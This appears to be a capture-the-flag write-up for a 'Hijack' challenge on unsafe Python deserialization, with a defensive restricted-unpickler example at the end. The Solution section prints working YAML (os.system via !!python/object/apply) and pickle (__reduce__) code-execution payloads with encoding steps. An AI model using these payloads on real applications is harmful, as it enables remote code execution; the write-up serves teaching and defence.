2023 Cyber Apocalypse: Hijack

Challenge Information

Attribute    Details
Event        2023 Cyber Apocalypse
Category     Misc
Challenge    Hijack

Summary

This challenge demonstrates two dangerous deserialization vulnerabilities in Python: unsafe YAML parsing and pickle deserialization. Both can lead to arbitrary code execution when processing untrusted data.


Analysis

Vulnerability 1: YAML Deserialization

PyYAML’s tag syntax lets a document ask the loader to instantiate arbitrary Python objects. When the document is parsed with yaml.load() and an unsafe loader, the !!python/object/apply tag resolves a dotted name and calls it with the supplied arguments during deserialization:

!!python/object/apply:os.system [ "cd /ctf; cat flag.txt" ]

This YAML payload calls os.system() with the provided command while the document is being parsed, before the application ever sees the resulting object.

Vulnerability 2: Pickle Deserialization

Python’s pickle format stores instructions for rebuilding an object, and those instructions can include a call to any importable callable. A class that overrides __reduce__() chooses that callable and its arguments, so code runs as soon as the bytes are unpickled:

class Exploit(Config):
    def __reduce__(self):
        return (os.system, ('ls',))

payload = pickle.dumps(Exploit('1', 'on', '1', '1', '1f'))

Solution

YAML Exploitation:

import yaml
import base64
payload_yaml = '''
!!python/object/apply:os.system [ "cd /ctf; cat flag.txt" ]
'''
encoded_payload = base64.b64encode(payload_yaml.encode("utf-8")).decode("utf-8")
print(encoded_payload)
# To exploit: Pass base64-encoded payload to vulnerable application
# The application will decode and parse it with yaml.load()

Pickle Exploitation:

import os
import pickle
import base64

class Config:
    def __init__(self, IR_spectrometer_temp, auto_calibration, propulsion_temp, solar_array_temp, units):
        self.IR_spectrometer_temp = IR_spectrometer_temp
        self.auto_calibration = auto_calibration
        self.propulsion_temp = propulsion_temp
        self.solar_array_temp = solar_array_temp
        self.units = units

class Exploit(Config):
    def __reduce__(self):
        return (os.system, ('ls',))

payload = pickle.dumps(Exploit('1', 'on', '1', '1', '1f'))
encoded_payload = base64.b64encode(payload)
print(encoded_payload)
# To exploit: Pass base64-encoded payload to vulnerable application
# The application will decode and unpickle it with pickle.loads()

Exploitation process:

  1. Create payload (YAML or Pickle)
  2. Encode with base64
  3. Submit to vulnerable endpoint
  4. Application deserializes and executes code

Key Takeaways

  • Never deserialize untrusted data
  • YAML with yaml.load() is dangerous; use yaml.safe_load()
  • Python’s pickle is not safe for untrusted data
  • Deserialization attacks lead to Remote Code Execution (RCE)
  • Always validate and sanitize input before processing
  • Use safe serialization formats (JSON) with safe parsers
  • Implement strict type checking if deserialization is necessary
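The last takeaway is the one the writeup does not show in code. Below is an added defensive example, not part of the original writeup or the challenge's own code, that demonstrates the standard restricted-unpickler pattern from the Python documentation: pickle resolves every callable it wants to invoke through Unpickler.find_class(), so an allow-list there stops a __reduce__ payload before anything is executed. The Config class mirrors the writeup's; RogueConfig, the payload bytes and the validate_config() rules (every field a string, auto_calibration limited to "on"/"off") are constructed for this example. RogueConfig asks the loader to call builtins.print rather than os.system, so the demonstration is harmless, but the loader must refuse it for the same reason.

```python
import io
import pickle


class Config:
    """Plain data holder, mirroring the Config class from the writeup."""

    def __init__(self, IR_spectrometer_temp, auto_calibration,
                 propulsion_temp, solar_array_temp, units):
        self.IR_spectrometer_temp = IR_spectrometer_temp
        self.auto_calibration = auto_calibration
        self.propulsion_temp = propulsion_temp
        self.solar_array_temp = solar_array_temp
        self.units = units


class RogueConfig(Config):
    """Constructed stand-in for the writeup's Exploit class. It requests a
    call to builtins.print instead of os.system, so it is harmless to run,
    but a loader that honours it would execute whatever callable was named."""

    def __reduce__(self):
        return (print, ("callable invoked at load time",))


# (module, name) pairs the unpickler may resolve. Keyed on the class object
# so the entry follows Config whichever module it is defined in.
ALLOWED_GLOBALS = {(Config.__module__, Config.__name__)}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global not on ALLOWED_GLOBALS.

    A plain Config pickle references only the Config class (NEWOBJ + BUILD
    with a dict of strings). Anything that names os.system, builtins.print,
    subprocess.* etc. is rejected here, before the call opcode is reached.
    """

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Drop-in replacement for pickle.loads() that uses the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def validate_config(obj) -> Config:
    """Post-load type check. The allow-list stops code execution; this stops a
    structurally wrong object from reaching application logic. Rules are
    assumed for the example: exact Config type, every field a str,
    auto_calibration one of "on"/"off"."""
    if type(obj) is not Config:
        raise TypeError(f"expected Config, got {type(obj).__name__}")
    fields = ("IR_spectrometer_temp", "auto_calibration",
              "propulsion_temp", "solar_array_temp", "units")
    for field in fields:
        if not isinstance(getattr(obj, field, None), str):
            raise TypeError(f"field {field} must be a str")
    if obj.auto_calibration not in ("on", "off"):
        raise ValueError("auto_calibration must be 'on' or 'off'")
    return obj


def load_outcome(data: bytes):
    """Load untrusted bytes and report ("accepted", Config) or ("rejected", reason)."""
    try:
        return "accepted", validate_config(restricted_loads(data))
    except (pickle.UnpicklingError, TypeError, ValueError) as exc:
        return "rejected", str(exc)


# Constructed sample payloads: a benign config and the rogue one.
BENIGN_PAYLOAD = pickle.dumps(Config("1", "on", "1", "1", "1f"))
ROGUE_PAYLOAD = pickle.dumps(RogueConfig("1", "on", "1", "1", "1f"))
# Benign config with a field type the validator should reject.
BAD_TYPE_PAYLOAD = pickle.dumps(Config(1, "on", "1", "1", "1f"))


if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_PAYLOAD), ("rogue", ROGUE_PAYLOAD),
                        ("bad-type", BAD_TYPE_PAYLOAD)):
        status, detail = load_outcome(blob)
        print(f"{label:9s} -> {status}: {detail if status == 'rejected' else detail.units}")
```

The allow-list narrows the attack surface considerably, but it is still pickle: the format remains a small virtual machine, and the Python documentation continues to recommend a data-only format such as JSON for untrusted input. A restricted unpickler is a containment measure for code you cannot change, not a reason to keep accepting pickles from the network.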